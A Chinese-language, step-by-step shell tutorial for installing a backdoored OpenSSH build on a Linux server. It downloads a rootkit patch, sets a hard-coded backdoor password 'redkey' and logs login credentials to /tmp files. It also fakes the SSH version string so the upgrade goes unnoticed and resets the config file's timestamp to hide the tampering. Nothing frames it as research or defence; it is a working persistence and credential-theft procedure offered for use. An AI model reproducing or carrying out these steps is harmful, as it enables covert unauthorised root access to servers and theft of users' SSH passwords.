一.查看SSH版本[root@redkey vmshare]# ssh -V
OpenSSH_5.3p1, OpenSSL 1.0.0-fips 29 Mar 2010
二.下载SSH 源码包
源码包:http://openbsd.org.ar/pub/OpenBSD/OpenSSH/portable/openssh-5.9p1.tar.gz
后门文件:http://core.ipsecs.com/rootkit/patch-to-hack/0x06-openssh-5.9p1.patch.tar.gz
三.备份原有ssh配置文件[root@redkey ~]# cp -p /etc/ssh/sshd_config{,.bak}
四.编译安装[root@redkey vmshare]# tar -xzvf openssh-5.9p1.tar.gz[root@redkey vmshare]# tar -xzvf 0x06-openssh-5.9p1.patch.tar.gz[root@redkey vmshare]# cd openssh-5.9p1.patch/[root@redkey openssh-5.9p1.patch]# cp sshbd5.9p1.diff ../openssh-5.9p1[root@redkey openssh-5.9p1.patch]# cd ../openssh-5.9p1[root@redkey openssh-5.9p1]# patch < sshbd5.9p1.diff
patching file auth.c
patching file auth-pam.c
patching file auth-passwd.c
patching file canohost.c
patching file includes.h
patching file log.c
patching file servconf.c
patching file sshconnect2.c
patching file sshlogin.c
patching file version.hxiu
设置后门密码"redkey"[root@redkey openssh-5.9p1]# vim includes.h175 int secret_ok;
176 FILE *f;
177 #define ILOG "/tmp/ilog"
178 #define OLOG "/tmp/olog"
179 #define SECRETPW "redkey"
180 #endif /* INCLUDES_H */
修改版本信息(SSH_VERSION):/* $OpenBSD: version.h,v 1.62 2011/08/02 23:13:01 djm Exp $ */
#define SSH_VERSION "OpenSSH_5.3p1"
#define SSH_PORTABLE "p1"
#define SSH_RELEASE SSH_VERSION SSH_PORTABLE
编译&安装[root@redkey openssh-5.9p1]# ./configure --prefix=/usr/ --sysconfdir=/etc/ssh/ --with-pam --with-kerberos5[root@redkey openssh-5.9p1]# make
[root@redkey openssh-5.9p1]# make install
五.还原sshd_config文件时间戳[root@redkey ssh]# touch -r sshd_config.bak ssh_config
六.重启服务或重新载入配置[root@redkey ssh]# service sshd reload
七.常见问题
1.需要安装的软件包openssl openssl-devel pam-devel
2.编译常见的问题编译过程中可能出现的报错:
configure: error: *** zlib.h missing – please install first or check config.log
#
#yum install zlib-devel
configure: error: *** Can't find recent OpenSSL libcrypto (see config.log for details) ***
#
#yum install openssl openssl-devel